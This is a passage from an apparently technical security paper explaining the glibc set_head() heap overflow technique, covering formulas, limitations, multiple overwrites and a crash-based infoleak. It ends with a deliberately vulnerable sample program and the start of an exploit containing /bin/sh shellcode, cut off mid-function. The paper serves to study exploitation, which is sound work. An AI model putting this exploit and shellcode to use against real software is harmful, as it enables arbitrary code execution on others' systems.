arbitrary overwrite, two specific steps need to be followed. These steps 
are described below. 


First step: 


The first step of the set_head() technique consists in overflowing the size 
field of the top chunk to make the malloc library think it is bigger than 
it actually is. The specific value that you will overwrite with will 
depend on the parameters of the exploitable situation. Below is an ascii 
graphic of the memory layout at the time of the overflow. Notice that the 
location of the top chunk is somewhere in the heap. 


0xbfffffff -> +-----------------+
              |                 |
              |      stack      |
              |                 |
              :                 :
              :                 :
              |                 |
              |      heap       |<--- Top chunk
              |                 |
              +-----------------+
              |      data       |
              +-----------------+
              |                 |
              |      text       |
              |                 |
0x08048000 -> +-----------------+


Second step: 


After this, a call to malloc with a user-supplied size should be issued. 
With this call, the top chunk will be split in two parts. One part will be 
returned to the user, and the other part will be the remainder chunk (the 
top chunk). 


The purpose of this step is to move the top chunk before the location that 
you want to overwrite. This location needs to be on the stack, and you 
will see why at section 4.2.2. During this step, the malloc code will set 
the size of the new top chunk with the set_head() macro. Look at the 
representation below to better understand the memory layout at the time of 
the overwrite: 


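0xbfffffff -> +-------------------+
              |                   |
              |       stack       |
              |                   |
              +-------------------+
              | size of topchunk  |
              +-------------------+
              | prev_size not used|
              +-------------------+<--- Top chunk
              |                   |
              :                   :
              :                   :
              |                   |
              |       heap        |
              |                   |
              +-------------------+
              |       data        |
              +-------------------+
              |                   |
              |       text        |
              |                   |
0x08048000 -> +-------------------+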
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If you control the new location of the top chunk and the new size of the 
top chunk, you can get a "write almost 4 arbitrary bytes to almost 
anywhere" primitive. 


----[ 2.3 - The details of set_head()


The set_head macro is used many times in the malloc library. However, it's
used at a particularly interesting place where it's possible to
influence its parameters. This influence will let the attacker overwrite 4
bytes in memory with a value that he can control.


When there is a call to malloc, different methods are tried to allocate the
requested memory. MaXX did a pretty great job at explaining the malloc
algorithm in section 3.5.1 of his text[3]. Reading his text is highly
suggested before continuing with this text. Here are the main points of
the algorithm:


1. Try to find a chunk in the bin corresponding to the size of the
request;
2. Try to use the remainder chunk;
3. Try to find a chunk in the regular bins.


If those three steps fail, interesting things happen. The malloc function
tries to split the top chunk. The 'use_top' code portion is then called.
It's in that portion of code that it's possible to take advantage of a call
to set_head(). Let's analyze the use_top code:


--[ From malloc.c


01 Void_t*
02 _int_malloc(mstate av, size_t bytes)
03 {
04   INTERNAL_SIZE_T nb;             /* normalized request size */
05
06   mchunkptr victim;               /* inspected/selected chunk */
07   INTERNAL_SIZE_T size;           /* its size */
08
09   mchunkptr remainder;            /* remainder from a split */
10   unsigned long remainder_size;   /* its size */
11
12
13   checked_request2size(bytes, nb);
14
15   [ ... ]
16
17   use_top:
18
19     victim = av->top;
20     size = chunksize(victim);
21
22     if ((unsigned long)(size) >= (unsigned long)(nb + MINSIZE)) {
23       remainder_size = size - nb;
24       remainder = chunk_at_offset(victim, nb);
25       av->top = remainder;
26       set_head(victim, nb | PREV_INUSE |
27                (av != &main_arena ? NON_MAIN_ARENA : 0));
28       set_head(remainder, remainder_size | PREV_INUSE);
29
30       check_malloced_chunk(av, victim, nb);
31       return chunk2mem(victim);
32     }
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All the magic happens at line 28. By forcing a particular context inside 
the application, it’s possible to control set_head’s parameters and then 
overwrite almost any memory addresses with almost four arbitrary bytes. 


Let's see how it's possible to control these two parameters, which are
'remainder' and 'remainder_size':


1. How to get control of 'remainder_size':


a. At line 13, 'nb' is filled with the normalized size of the
value of the malloc call. The attacker should have control
over the value of this malloc call.


b. Remember that this technique requires the size field of
the top chunk to be overwritten by the overflow. At
lines 19 and 20, the value of the overwritten size field of the
top chunk is loaded into 'size'.


c. At line 22, a check is done to ensure that the top chunk is
large enough to take care of the malloc request. The
attacker needs this condition to evaluate to true to reach
the set_head() macro at line 28.


d. At line 23, the requested size of the malloc call is
subtracted from the size of the top chunk. The remaining
value is then stored in 'remainder_size'.


2. How to get control of 'remainder':


a. At line 13, 'nb' is filled with the normalized size of the
value of the malloc call. The attacker should have control
over the value of this malloc call.


b. Then, at line 19, the variable 'victim' gets filled with the
address of the top chunk.


c. After this, at line 24, chunk_at_offset() is called. This
macro adds the content of 'nb' to the value of 'victim'. The
result is stored in 'remainder'.


Finally, at line 28, the set_head() macro modifies the size field of the
fake remainder chunk and fills it with the content of the variable
'remainder_size'. This is how you get your "write almost 4 arbitrary bytes
to almost anywhere in memory" primitive.
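The walk through lines 19 to 28 can be replayed with plain integers. The sketch below is a simplified model under assumptions, not glibc code: addresses and sizes are 32-bit values, MINSIZE is assumed to be 16 (its usual 32-bit value), the flag mask covers the three low bits, and the struct and function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define PREV_INUSE 0x1u
#define SIZE_BITS  0x7u   /* low flag bits cleared by chunksize()  */
#define MINSIZE    16u    /* assumed value for a 32-bit target     */

struct use_top_result {
    int      split;           /* 1 if the check at line 22 passes  */
    uint32_t remainder;       /* address of the new top chunk      */
    uint32_t remainder_size;  /* value computed at line 23         */
    uint32_t written;         /* value stored by set_head(), l. 28 */
};

/* Integer replay of the use_top code for a 32-bit process.
 * 'top' is the top chunk address, 'top_size_field' its (overwritten)
 * size field and 'nb' the normalized request size. */
static struct use_top_result
use_top_sketch(uint32_t top, uint32_t top_size_field, uint32_t nb)
{
    struct use_top_result r = {0, 0, 0, 0};
    uint32_t size = top_size_field & ~SIZE_BITS;    /* line 20 */

    if (size >= nb + MINSIZE) {                     /* line 22 */
        r.split = 1;
        r.remainder_size = size - nb;               /* line 23 */
        r.remainder = top + nb;                     /* line 24 */
        r.written = r.remainder_size | PREV_INUSE;  /* line 28 */
    }
    return r;
}
```

With the made-up values top = 0x0804a008, size field = 0xc0000009 and nb = 0xb7fb4ff8, the new top chunk lands at 0xbffff000 and the value 0x0804b011 is stored in its size field. With a size field of 0x77fb40f9 instead, the check at line 22 fails and nothing is written, which is one reason why not every pair of values is usable.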


--[ 3 - Automation


It was explained in section 2.3 that the variables 'remainder' and
'remainder_size' will be used as parameters to the set_head macro. The
following steps will explain how to proceed in order to get the desired
value in those two variables.


----[ 3.1 - Define the basic properties 


Before trying to exploit a security hole with the set_head technique, the 
attacker needs to define the parameters of the vulnerable context. These 
parameters are: 


1. The return location: This is the location in memory that you
want to write to. It is often referred to as 'retloc' throughout
this paper.


2. The return address: This is the content that you will write to
your return location. Normally, this will be a memory address
that points to your shellcode. It is often referred to as 'retadr'
throughout this paper.


3. The location of the topchunk: To use this technique, you must
know the exact position of the top chunk in memory. This
location is often referred to as 'toploc' throughout this paper.


----[ 3.2 - Extract the formulas 


The attacker has control over two things during the exploitation stage:
first, the content of the overwritten top chunk's size field and second,
the size parameter to the malloc call. The values that the attacker
chooses for these will determine the exact content of the variables
'remainder' and 'remainder_size' later used by the set_head() macro.


Below, two formulas are presented to help the attacker find the appropriate 
values. 


1. How to get the value for the malloc parameter:


a. The following line is taken directly from the malloc.c code:


remainder = chunk_at_offset (victim, nb)


b. 'nb' is the normalized value of the malloc call. It's the
result of the macro request2size(). To make things simpler,
let's add 8 to this value to take care of this macro:


remainder = chunk_at_offset (victim, nb + 8)


c. chunk_at_offset() adds the normalized size 'nb' to the top
chunk's location:


remainder = toploc + (nb + 8)


d. 'remainder' is the return location (i.e. 'retloc') and 'nb'
is the malloc size (i.e. 'malloc_size'):


retloc = toploc + (malloc_size + 8)


e. Isolate the 'malloc_size' variable to get the final formula:


malloc_size = (retloc - toploc - 8)


2. The second formula is how to get the new size of the top chunk.


a. The following line is taken directly from the malloc.c code:


remainder_size = size - nb;


b. 'size' is the size of the top chunk (i.e. 'topchunk_size'),
and 'nb' is the normalized parameter of the malloc call
(i.e. 'malloc_size'):


remainder_size = topchunk_size - malloc_size


c. 'remainder_size' is in fact the return address
(i.e. 'retadr'):


retadr = topchunk_size - malloc_size


d. Isolate 'topchunk_size' to get the final formula:


topchunk_size = retadr + malloc_size


e. topchunk_size will get its three least significant bits
cleared by the macro chunksize(). Let's consider this in the
formula by adding 8 to the right side of the equation:


topchunk_size = (retadr + malloc_size + 8)


f. Take into consideration that the PREV_INUSE flag is being set
in the set_head() macro:


topchunk_size = (retadr + malloc_size + 8) | PREV_INUSE


----[ 3.3 - Compute the values 


You now have the two basic formulas:


1. malloc_size = (retloc - toploc - 8)


2. topchunk_size = (retadr + malloc_size + 8) | PREV_INUSE


You can now proceed with finding the exact values that you will plug into 
your exploit. 


To facilitate the integration of those formulas in your exploit code, you
can use the set_head_compute() function found in the file(1) utility
exploit code (refer to section 6.2.3). Here is the prototype of the
function:


struct sethead * set_head_compute
(unsigned int retloc, unsigned int retadr, unsigned int toploc);


The structure returned by the function set_head_compute() is defined this
way:


struct sethead {
unsigned long topchunk_size;
unsigned long malloc_size;
};


By giving this function your return location, your return address and your
top chunk location, it will compute the exact malloc size and top chunk
size to use in your exploit. It will also tell you if it's possible to
execute the requested write operation based on the return address and the
return location you have chosen.
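The two formulas of section 3.3 can be transcribed directly. The sketch below is only that transcription, under assumptions: it is not the author's set_head_compute() (whose body is not shown here), it performs no feasibility check, it models a 32-bit target with wrapping unsigned arithmetic, and the names sethead_sketch and sethead_sketch_compute are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define PREV_INUSE 0x1u

/* Hypothetical result type, modeled on the struct sethead above. */
struct sethead_sketch {
    uint32_t topchunk_size;  /* value to overflow into the top chunk */
    uint32_t malloc_size;    /* size to pass to the malloc call      */
};

/* Direct transcription of the two formulas:
 *   malloc_size   = retloc - toploc - 8
 *   topchunk_size = (retadr + malloc_size + 8) | PREV_INUSE
 * All arithmetic wraps modulo 2^32, as on the 32-bit target. */
static struct sethead_sketch
sethead_sketch_compute(uint32_t retloc, uint32_t retadr, uint32_t toploc)
{
    struct sethead_sketch r;

    r.malloc_size = retloc - toploc - 8u;
    r.topchunk_size = (retadr + r.malloc_size + 8u) | PREV_INUSE;
    return r;
}
```

With the made-up values toploc = 0x0804a008, retloc = 0xbffff000 and retadr = 0x0804b010, the sketch gives malloc_size = 0xb7fb4ff0 and topchunk_size = 0xc0000009.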


--[ 4 - Limitations


At the time of writing this paper, there was no simple and easy way to 
exploit a heap overflow when the top chunk is involved. Each exploitation 
technique needs a particular context to work successfully. The set_head 
technique is no different. It has some requirements to work properly. 


Also, it’s not a real "write 4 arbitrary bytes to anywhere" primitive. In 
fact, it would be more of a "write almost 4 arbitrary bytes to almost 
anywhere in memory" primitive. 


----[ 4.1 - Requirements of two different techniques 


Specific elements need to be present to exploit a situation in which the
wilderness chunk is involved. These elements tend to impose a lot of
constraints when trying to exploit a program. Below, the requirements for
the set_head technique are listed, alongside those of the "House of Force"
technique. As you will see, each technique has its pros and cons.


------[ 4.1.1 - The set_head() technique


Minimum requirements:


1. The size field of the topchunk needs to be overwritten with a 
value that the attacker can control; 


2. Then, there is a call to malloc with a parameter that the 
attacker can control; 


This technique will let you write almost 4 arbitrary bytes to almost 
anywhere. 


------[ 4.1.2 - The "House of Force" technique


Minimum requirements: 


1. The size field of the topchunk must be overwritten with a very 
large value; 


2. Then, there must be a first call to malloc with a very large 
size. An important point is that this same allocated buffer 
should only be freed after the third step. 


3. Finally, there should be a second call to malloc. This buffer 
should then be filled with some user supplied data. 


This technique will, in the best-case scenario, let you overwrite any 
region in memory with a string of an arbitrary length that you control. 


----[ 4.2 - Almost 4 bytes to almost anywhere technique


This set_head technique is not really a "write 4 arbitrary bytes anywhere 
in memory" primitive. There are some restrictions in malloc.c that greatly 
limit the possible values an attacker can use for the return location and 
the return address in an exploit. Still, it’s possible to run arbitrary 
code if you carefully choose your values. 


Below you will find the three main restrictions of this technique: 


------[ 4.2.1 - Everything in life is a multiple of 8


A disadvantage of the set_head technique is the presence of macros that
ensure memory locations and values are a multiple of 8 bytes. These macros
are:


   - checked_request2size() and
   - chunksize()


Ultimately, this will have some influence on the selection of the return 
location and the return address. 


The memory addresses that you can overwrite with the set_head technique
need to be aligned on an 8-byte boundary. Interesting locations to
overwrite on the stack usually include a saved EIP of a stack frame or a
function pointer. These pointers are aligned on a 4-byte boundary, so with
this technique, you will be able to modify one memory address out of two.
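

To make the alignment rule concrete, here is a minimal sketch in C. It
assumes a 32-bit target and a top chunk location that is already a multiple
of 8, and it ignores the MINSIZE clamp of request2size(), which does not
matter for the large sizes involved here. The names retloc_is_reachable()
and effective_retloc() are made up for this illustration.

```c
#include <stdint.h>

/* Assumption: chunks are aligned on 8 bytes and the size field that
 * set_head() rewrites sits 4 bytes after the start of the chunk. */
#define CHUNK_ALIGN        8u
#define SIZE_FIELD_OFFSET  4u

/* Returns 1 when set_head() can land exactly on retloc. */
int retloc_is_reachable(uint32_t retloc)
{
    return (retloc % CHUNK_ALIGN) == SIZE_FIELD_OFFSET;
}

/* Returns the location that is really written when retloc is requested.
 * This is toploc + request2size(retloc - toploc - 8) + 4, simplified
 * under the assumption that toploc is a multiple of 8. */
uint32_t effective_retloc(uint32_t retloc)
{
    return ((retloc + 3u) & ~(CHUNK_ALIGN - 1u)) + SIZE_FIELD_OFFSET;
}
```

Under these assumptions, effective_retloc(0xc0c0c0c0) gives 0xc0c0c0c4,
while 0xbffffffc is returned unchanged because it is already reachable.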


The return address will also need to be a multiple of 8 (not counting the
logical OR with PREV_INUSE). Normally, the attacker has the possibility of
providing a NOP cushion right before his shellcode, so this is not really a
big issue.


------[ 4.2.2 - Top chunk’s size needs to be bigger than the requested
        malloc size


This is the main disadvantage of the set_head technique. For the top chunk 
code to be triggered and serve the memory request, there is a verification 
before the top chunk code is executed: 


--[ From malloc.c 


if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE)) {
        [...]
}


In short, this line requires that the size of the top chunk be bigger than
the size requested by the malloc call. Since the variables ’size’ and ’nb’
are computed from the return location, the return address and the top
chunk’s location, it will greatly limit the content and the location of the
arbitrary overwrite operation. Still, there are valid combinations of a
return address and a return location.


Let’s see what the values of ’size’ and ’nb’ will be for a given return
location and return address, and find out in which situations ’size’ is
greater than ’nb’. Consider that the location of the top chunk is static
and that it is at 0x080614f8:


   return        return        size          nb
   location      address

   0x0804b150    0x08061000     134523993    4294876240
   0x0804b150    0xbffffbaa    3221133059    4294876240
   0xbffffaaa    0xbffffbaa    2012864861    3086607786
   0xbffffaaa    0x08061000    3221222835    3086607786   <- size > nb


As you can see from this chart, the only time that you get a situation
where ’size’ is greater than ’nb’ is when your return location is somewhere
in the stack and when your return address is somewhere in the heap.
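

The stack/heap rows of the chart can be recomputed with a few lines of C.
This is only a sketch: it assumes 32-bit arithmetic, and, like the chart,
it uses the raw malloc request for ’nb’ rather than the normalized one. The
function names are invented for this example.

```c
#include <stdint.h>

#define PREV_INUSE 0x1u
#define MINSIZE    16u   /* value used by the exploit code in section 6 */

/* 'nb' as shown in the chart: the size passed to malloc. */
uint32_t nb_for(uint32_t retloc, uint32_t toploc)
{
    return retloc - toploc - 8u;
}

/* 'size' as shown in the chart: the value placed in the top chunk. */
uint32_t size_for(uint32_t retadr, uint32_t nb)
{
    return (retadr + nb + 8u) | PREV_INUSE;
}

/* Mirrors the malloc.c test quoted above, on 32-bit unsigned values. */
int top_chunk_serves(uint32_t size, uint32_t nb)
{
    return size >= nb + MINSIZE;
}
```

With toploc = 0x080614f8, a return location of 0xbffffaaa and a return
address of 0x08061000 pass the test, while a return location of 0x0804b150
with the same return address does not.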


------[ 4.2.3 - Logical OR with PREV_INUSE


When the set_head macro is called, ’remainder_size’, which is the return
address, will be altered by a logical OR with the flag PREV_INUSE:


--[ From malloc.c

#define PREV_INUSE 0x1

set_head(remainder, remainder_size | PREV_INUSE);


It was said in section 4.2.1 that the return address will always be a
multiple of 8 bytes due to the normalisation done by some macros. With the
PREV_INUSE logical OR, it will be a multiple of 8 bytes, plus 1. With a
NOP cushion, this problem is solved. Compared to the previous two, this
restriction is a very small one.
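

As an illustration, the value that really ends up at the return location
can be computed as follows. This is a sketch under the assumption of a
32-bit target (SIZE_SZ = 4, 8-byte alignment); written_value() and
request2size32() are names chosen for this example, and the arithmetic
follows the checks done by set_head_compute() in section 6.

```c
#include <stdint.h>

#define PREV_INUSE        0x1u
#define SIZE_BITS         0x7u
#define SIZE_SZ           4u
#define MALLOC_ALIGN_MASK 7u
#define MINSIZE           16u

/* 32-bit version of the request2size() normalization. */
uint32_t request2size32(uint32_t req)
{
    uint32_t padded = req + SIZE_SZ + MALLOC_ALIGN_MASK;
    return (padded < MINSIZE) ? MINSIZE : (padded & ~MALLOC_ALIGN_MASK);
}

/* Value stored at the return location: the requested return address
 * rounded to a multiple of 8, with the PREV_INUSE bit set. */
uint32_t written_value(uint32_t retloc, uint32_t retadr, uint32_t toploc)
{
    uint32_t malloc_size   = retloc - toploc - 8u;
    uint32_t topchunk_size = (retadr + malloc_size + 8u) | PREV_INUSE;

    return ((topchunk_size & ~SIZE_BITS) - request2size32(malloc_size))
           | PREV_INUSE;
}
```

For instance, with a return location of 0xbffff52c, a top chunk at
0x8049a38 and a requested return address of 0x8049990, the value written
is 0x8049991, which still falls inside a NOP cushion.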


--[ 5 - Taking set_head() to the next level 


As a general rule, hackers try to make their exploit as reliable as 
possible. Exploiting a vulnerability in a confined lab and in the wild are 
two different things. This section will try to present some techniques to 
improve the reliability of the set_head technique. 


----[ 5.1 - Multiple overwrites 


One way to make the exploitation process a lot more reliable is by using
multiple overwrites. Indeed, having the possibility of overwriting a
memory location with 4 bytes is good, but the possibility to write multiple 
times to memory is even better[8]. Being able to overwrite multiple memory 
locations with set_head will increase your chance of finding a valid return 
location on the stack. 


A great advantage of the set_head technique is that it does not corrupt 
internal malloc information in a way that prevents the program from working 
properly. This advantage will let you safely overwrite more than one 
memory location. 


To correctly put this technique in place, the attacker will need to start
overwriting addresses at the top of the stack, and go downward until he
seizes control of the program. Here are the possible addresses that
set_head() lets you overwrite on the stack:


   1: 0xbffffffc
   2: 0xbffffff4
   3: 0xbfffffec
   4: 0xbfffffe4
   5: 0xbfffffdc
   6: 0xbfffffd4
   7: 0xbfffffcc
   8: 0xbfffffc4
   9: ...


Eventually, the attacker will fall on a memory location which is a saved 
EIP in a stack frame. If he’s lucky enough, this new saved EIP will be 
popped in the EIP register. 


Remember that for a successful overwrite, the attacker needs to do two
things: 


1. Overwrite the top chunk with a specific value; 
2. Make a call to malloc with a specific value. 


Based on the formulas that were found in section 3.3, let’s compute the 
values for the top chunk size and the size for the malloc call for each 
overwrite operation. Let’s take the following values for an example case: 


   The location of the top chunk:   0x08050100
   The return address:              0x08050200
   The return location:             Decrementing from 0xbffffffc
                                    to 0xbfffffc4


   return        top chunk     malloc
   location      size          size

   0xbffffffc    3221225725    3086679796
   0xbffffff4    3221225717    3086679788
   0xbfffffec    3221225709    3086679780
   0xbfffffe4    3221225701    3086679772
   0xbfffffdc    3221225693    3086679764
   0xbfffffd4    3221225685    3086679756
   0xbfffffcc    3221225677    3086679748
   0xbfffffc4    3221225669    3086679740


By looking at this chart, you can determine that for each overwrite 
operation, the attacker would need to overwrite the size of the top chunk 
with a new value and make a call to malloc with an arbitrary value. Would 
it be possible to improve this a little bit? It would be great if the only 
thing you needed to change between each overwrite operation was the size of 
the malloc call, leaving the size of the top chunk untouched.


It is possible. Look closely at the formulas used to compute malloc_size
and topchunk_size. Let’s say the attacker has only one opportunity
to overwrite the size of the top chunk. Would it still be possible to
do multiple overwrites using the set_head technique while keeping the
same size for the top chunk?


   1. malloc_size = (retloc - toploc - 8)
   2. topchunk_size = (retadr + malloc_size + 8) | PREV_INUSE


If you look at how ’topchunk_size’ is computed, it seems possible. Changing
the value of ’retloc’ affects ’malloc_size’, and ’malloc_size’ is in turn
used to compute ’topchunk_size’. By adjusting ’retadr’ in the second
formula, you can always hit the same ’topchunk_size’. Let’s look at the
same example, but this time with a changing return address. While the
return location is decrementing by 8, let’s increment the return address
by 8.


   return        return       top chunk     malloc
   location      address      size          size

   0xbffffffc    0x8050200    3221225725    3086679796
   0xbffffff4    0x8050208    3221225725    3086679788
   0xbfffffec    0x8050210    3221225725    3086679780
   0xbfffffe4    0x8050218    3221225725    3086679772
   0xbfffffdc    0x8050220    3221225725    3086679764
   0xbfffffd4    0x8050228    3221225725    3086679756
   0xbfffffcc    0x8050230    3221225725    3086679748
   0xbfffffc4    0x8050238    3221225725    3086679740
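

The chart above can be regenerated with a short routine. The following is a
sketch in C that assumes 32-bit arithmetic; struct overwrite and
plan_overwrites() are hypothetical names used only for this illustration.

```c
#include <stddef.h>
#include <stdint.h>

#define PREV_INUSE 0x1u

/* One row of the chart. */
struct overwrite {
    uint32_t retloc;
    uint32_t retadr;
    uint32_t topchunk_size;
    uint32_t malloc_size;
};

/* Fills 'out' with 'count' rows. The return location goes down by 8
 * and the return address goes up by 8 at each step, so that
 * (retadr + malloc_size) stays constant from one row to the next. */
void plan_overwrites(uint32_t retloc, uint32_t retadr, uint32_t toploc,
                     struct overwrite *out, size_t count)
{
    for (size_t i = 0; i < count; i++) {
        out[i].retloc        = retloc;
        out[i].retadr        = retadr;
        out[i].malloc_size   = retloc - toploc - 8u;
        out[i].topchunk_size = (retadr + out[i].malloc_size + 8u)
                               | PREV_INUSE;
        retloc -= 8u;
        retadr += 8u;
    }
}
```

Calling plan_overwrites(0xbffffffc, 0x08050200, 0x08050100, rows, 8) yields
the eight rows of the chart, each with the same top chunk size.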


You can see that the size of the top chunk is always the same. On the
other hand, the return address changes through the multiple overwrites.
The attacker needs to have an NOP cushion big enough to adapt to this
variation.


Refer to section 6.1.2.1 to get a sample vulnerable scenario exploitable
with multiple overwrites.


----[ 5.2 - Infoleak


As was stated in the Shellcoder’s Handbook[9]: "An information leak can
make even a difficult bug possible". Most of the time, people who write
exploits try to make them as reliable as possible. If hackers, using an
infoleak technique, can improve the reliability of the set_head technique,
well, that’s pretty good. The technique is already hard to use because it
relies on unknown memory locations, which are:


   - The return location
   - The top chunk location
   - The return address


When there is an overwrite operation, if the attacker is able to tell if
the program has crashed or not, he can turn this to his advantage. Indeed,
this knowledge could help him find one parameter of the exploitable
situation, which is the top chunk location.


The theory behind this technique is simple. If the attacker has the real
address of the top chunk, he will be able to write at the address
0xbffffffc but not at the address 0xc0000004.


Indeed, a write operation at the address 0xbffffffc will work because this
address is in the stack and its purpose is to store the environment
variables of the program. It does not significantly affect the behaviour
of the program, so the program will still continue to run normally.


On the other hand, if the attacker wrote in memory starting from
0xc0000000, there will be a segmentation fault because this memory region
is not mapped. After this violation, the program will crash. 


To take advantage of this behaviour, the attacker will have to do a series
of write operations while incrementing or decrementing the location of the
top chunk. For each top chunk location tried, there should be 6 write
operations.


Below, you will find the parameters of the exploitable situation to use
during the 6 write operations. The expected result is in the right column
of the chart. If you get these results, then the value used for the
location of the top chunk is the right one.


   return        return        Did it
   location      address       segfault ?

   0xc0000014    0x07070707    Yes
   0xc000000c    0x07070707    Yes
   0xc0000004    0x07070707    Yes
   0xbffffffc    0x07070707    No
   0xbffffff4    0x07070707    No
   0xbfffffec    0x07070707    No


If the 6 write operations made the program segfault each time, then the
attacker is probably writing after 0xbfffffff or below the limit of the
stack.


If the 6 write operations succeeded and the program did not crash, then it
probably means that the attacker overwrote some values in the stack. In
that case, decrement the value of the top chunk location to use.
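

The three outcomes described above can be summarized in a small decision
routine. This is only a sketch: the enum values and classify_probe() are
names invented for this example, and the "inconclusive" case for any other
pattern is an assumption that the text does not cover.

```c
/* Possible conclusions about the top chunk location that was tried. */
enum toploc_verdict {
    TOPLOC_MATCH,         /* the pattern of the chart was observed      */
    TOPLOC_TOO_HIGH,      /* no crash at all: decrement the location    */
    TOPLOC_OUT_OF_RANGE,  /* six crashes: writes land outside the stack */
    TOPLOC_INCONCLUSIVE   /* any other pattern (assumption)             */
};

/* segfault[i] is non-zero if write number i crashed the program. The
 * writes are ordered as in the chart, from 0xc0000014 to 0xbfffffec. */
enum toploc_verdict classify_probe(const int segfault[6])
{
    int crashes = 0;

    for (int i = 0; i < 6; i++)
        crashes += (segfault[i] != 0);

    if (crashes == 6)
        return TOPLOC_OUT_OF_RANGE;
    if (crashes == 0)
        return TOPLOC_TOO_HIGH;
    if (segfault[0] && segfault[1] && segfault[2]
        && !segfault[3] && !segfault[4] && !segfault[5])
        return TOPLOC_MATCH;
    return TOPLOC_INCONCLUSIVE;
}
```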


--[ 6 - Examples


The best way to learn something new is probably with the help of examples. 
Below, you will find some vulnerable codes and their exploits. 


A scenario-based approach is taken here to demonstrate the exploitability
of a situation. Ultimately, the exploitability of a context can be defined
by specific characteristics.


Also, the application of the set_head() technique on a real life example is
shown with the file(1) utility vulnerability. The set_head technique was
devised to exploit this specific vulnerability.


----[ 6.1 - The basic scenarios


To simplify things, it’s useful to define exploitable contexts in terms of 
scenarios. For each specific scenario, there should be a specific way to 
exploit it. Once the reader has learned those scenarios, he can then match 
them with vulnerable situations in software. He will then know exactly
what approach to use to make the most out of the vulnerability. 


--------[ 6.1.1.1 - The most basic form of the set_head() technique


This scenario is the most basic form of the application of the set_head()
technique. This is the approach that was used in the file(1) utility
exploit.


--[ scenario1.c

#include <stdio.h>
#include <stdlib.h>

int main (int argc, char *argv[]) {

        char *buffer1;
        char *buffer2;
        unsigned long size;

/* [1] */ buffer1 = (char *) malloc (1024);
/* [2] */ sprintf (buffer1, argv[1]);

        size = strtoul (argv[2], NULL, 10);

/* [3] */ buffer2 = (char *) malloc (size);

        return 0;
}

--[ end of scenario1.c


Here is a brief description of the important lines in this code: 
[1]: The top chunk is split and a memory region of 1024 bytes is requested. 


[2]: A sprintf call is made. The destination buffer is not checked to see 
if it is large enough. The top chunk can then be overwritten here. 


[3]: A call to malloc with a user-supplied size is done. 


--------[ 6.1.1.2 - Exploit


--[ exp1.c

/*
 * Exploit for scenario1.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

// The following #define are from malloc.c and are used
// to compute the values for the malloc size and the top chunk size.
#define PREV_INUSE 0x1
#define SIZE_BITS 0x7 // PREV_INUSE|IS_MMAPPED|NON_MAIN_ARENA
#define SIZE_SZ (sizeof(size_t))
#define MALLOC_ALIGNMENT (2 * SIZE_SZ)
#define MALLOC_ALIGN_MASK (MALLOC_ALIGNMENT - 1)
#define MIN_CHUNK_SIZE 16
#define MINSIZE (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) \
                & ~MALLOC_ALIGN_MASK))
#define request2size(req) (((req) + SIZE_SZ + MALLOC_ALIGN_MASK \
  < MINSIZE) ? MINSIZE : ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) \
  & ~MALLOC_ALIGN_MASK)


struct sethead { 
unsigned long topchunk_size; 
unsigned long malloc_size; 


}; 


/* linux_ia32_exec - CMD=/bin/sh Size=68 Encoder=PexFnstenvSub 
http://metasploit.com */ 

unsigned char scode[] =
"\x31\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x27"
"\xe2\xc0\xb3\x83\xeb\xfc\xe2\xf4\x4d\xe9\x98\x2a\x75\x84\xa8\x9e"
"\x44\x6b\x27\xdb\x08\x91\xa8\xb3\x4f\xcd\xa2\xda\x49\x6b\x23\xe1"
"\xcf\xea\xc0\xb3\x27\xcd\xa2\xda\x49\xcd\xb3\xdb\x27\xb5\x93\x3a"
"\xc6\x2f\x40\xb3";


struct sethead * set_head_compute
(unsigned long retloc, unsigned long retadr, unsigned long toploc) {

        unsigned long check_retloc, check_retadr;
        struct sethead *shead;

        shead = (struct sethead *) malloc (8);
        if (shead == NULL) {
                fprintf (stderr,
                  "--[ Could not allocate memory for sethead structure\n");
                exit (1);
        }

        if ( (toploc % 8) != 0 ) {
                fprintf (stderr,
                  "--[ Impossible to use 0x%x as the top chunk location.",
                  toploc);
                toploc = toploc - (toploc % 8);
                fprintf (stderr, " Using 0x%x instead\n", toploc);
        } else
                fprintf (stderr,
                  "--[ Using 0x%x as the top chunk location.\n", toploc);

        // The minus 8 is to take care of the normalization
        // of the malloc parameter
        shead->malloc_size = (retloc - toploc - 8);

        // By adding the 8, we are able to sometimes perfectly hit
        // the return address. To hit it perfectly, retadr must be a
        // multiple of 8 + 1 (for the PREV_INUSE flag).
        shead->topchunk_size = (retadr + shead->malloc_size + 8)
                               | PREV_INUSE;

        if (shead->topchunk_size < shead->malloc_size) {
                fprintf (stderr,
                  "--[ ERROR: topchunk size is less than malloc size.\n");
                fprintf (stderr,
                  "--[ Topchunk code will not be triggered\n");
                exit (1);
        }

        check_retloc = (toploc + request2size (shead->malloc_size) + 4);
        if (check_retloc != retloc) {
                fprintf (stderr,
                  "--[ Impossible to use 0x%x as the return location. ",
                  retloc);
                fprintf (stderr, "Using 0x%x instead\n", check_retloc);
        } else
                fprintf (stderr,
                  "--[ Using 0x%x as the return location.\n", retloc);

        check_retadr = ( (shead->topchunk_size & ~(SIZE_BITS))
                         - request2size (shead->malloc_size)) | PREV_INUSE;
        if (check_retadr != retadr) {
                fprintf (stderr,
                  "--[ Impossible to use 0x%x as the return address.",
                  retadr);
                fprintf (stderr, " Using 0x%x instead\n", check_retadr);
        } else
                fprintf (stderr,
                  "--[ Using 0x%x as the return address.\n", retadr);

        return shead;
}

void
put_byte (char *ptr, unsigned char data) {
        *ptr = data;
}

void
put_longword (char *ptr, unsigned long data) {
        put_byte (ptr, data);
        put_byte (ptr + 1, data >> 8);
        put_byte (ptr + 2, data >> 16);
        put_byte (ptr + 3, data >> 24);
}

int main (int argc, char *argv[]) {

        char *buffer;
        char malloc_size_string[20];
        unsigned long retloc, retadr, toploc;
        unsigned long topchunk_size, malloc_size;
        struct sethead *shead;

        if ( argc != 4) {
                printf ("wrong number of arguments, exiting...\n\n");
                printf ("%s <retloc> <retadr> <toploc>\n\n", argv[0]);
                return 1;
        }

        sscanf (argv[1], "0x%x", &retloc);
        sscanf (argv[2], "0x%x", &retadr);
        sscanf (argv[3], "0x%x", &toploc);

        shead = set_head_compute (retloc, retadr, toploc);
        topchunk_size = shead->topchunk_size;
